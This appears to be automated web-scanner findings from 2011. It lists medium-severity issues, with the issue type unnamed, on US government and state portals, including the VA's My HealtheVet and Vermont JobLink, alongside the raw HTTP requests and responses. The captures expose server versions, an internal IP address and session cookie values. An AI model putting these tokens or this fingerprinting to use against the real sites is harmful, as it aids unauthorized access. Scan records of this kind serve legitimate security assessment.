| GET /mhv-portal-web/anonymous Host: www.myhealth.va.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:37 GMT Content-type: text/html; charset=UTF-8 Cache-Control: no-cache="set-cookie" Pragma: No-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT X-wily-servlet: Clear appServerIp=10.224.43.30 Set-Cookie: JSESSIONID=KyLqN8DJh X-Powered-By: Servlet/2.4 JSP/2.0 X-wily-info: Clear guid=A66BDECC0AE02B1 Connection: close Set-Cookie: TSd0b0d9=f8f48700ac5 Content-Length: 22826 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>My HealtheVet </title><meta name="bea-portal-me ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.ncourt.com |
| Path: | /forms/DE/navigation.aspx |
| GET /forms/DE/navigation.aspx HTTP/1.1 Host: www.ncourt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:39:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 21619 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="_ctl0_Head1"> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/cmd/RetLogin |
| GET /iApp/ret/cmd/RetLogin HTTP/1.1 Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:42 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=EBB9219073261 Set-Cookie: JSESSIONID=0001ACicL Set-Cookie: MyNRSCookie=72444256 Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: private, no-cache=set-cookie Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 7645 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/content/landing |
| GET /iApp/ret/content/landing Host: www.nrsservicecenter.com Connection: keep-alive Referer: http://oh.gov/statee User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:38:13 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=832510E672CA1 Set-Cookie: TLTSID=832510E672CA1 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001PF1_bP7 Set-Cookie: MyNRSCookie=72444256 Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/ Set-Cookie: MyNRSCookie=72444256 Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/ Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 10263 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" x ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/landing.do |
| GET /iApp/ret/landing.do HTTP/1.1 Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:45 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=EDEE621873261 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001mmfBF Set-Cookie: MyNRSCookie=72444256 Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 10263 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" x ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/showPage.do |
| GET /iApp/ret/showPage.do HTTP/1.1 Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:45 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=EDD8FB4E73261 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001YFkAd Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 8439 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.scsignon.sc |
| Path: | / |
| GET /?CallbackUrl=https:/ Host: www.scsignon.sc.gov Connection: keep-alive Referer: https://www3.sctax.org Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 01:06:55 GMT Set-Cookie: TS958e6e=4cd4ad94e98 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 15349 <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title>DOR eSales Login</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.tennesse |
| Path: | /paams-app/index.htm |
| GET /paams-app/index.htm HTTP/1.1 Host: www.tennesseeanytime.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:58:48 GMT Server: Resin/3.0.17 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: JSESSIONID=au9PJ Connection: close Content-Length: 3269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.texasonline |
| Path: | /NASApp/rap/apps/license |
| GET /NASApp/rap/apps/license Host: www.texasonline.state.tx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Moved Temporarily Date: Sat, 30 Apr 2011 12:38:43 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c Cache-Control: no-cache Cache-Control: private Location: https://www.texasonline cachecontrol: private Set-Cookie: JSESSIONID=Gh6XN8DJg X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 369 <html><head><title>302 Moved Temporarily</title></head <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/ |
| GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/404/404_qry.cfm |
| GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8 <!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/default.cfm |
| GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/etp/etp_newuser_dsp |
| GET /ada/etp/etp_newuser_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/leavesite.cfm |
| GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_eligibility_dsp |
| GET /ada/mn_eligibility_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_login_fnc.cfm |
| GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:14:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf location: /ada Content-Type: text/html; charset=UTF-8 <!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_offices_dsp.cfm |
| GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_protectyourself |
| GET /ada/mn_protectyourself Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:20 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_quicksearch_dsp |
| GET /ada/mn_quicksearch_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache location: mn_empagreement_dsp.cfm Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off --> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_settings_dsp.cfm |
| GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_ssncheck.cfm |
| GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_veterans_dsp.cfm |
| GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
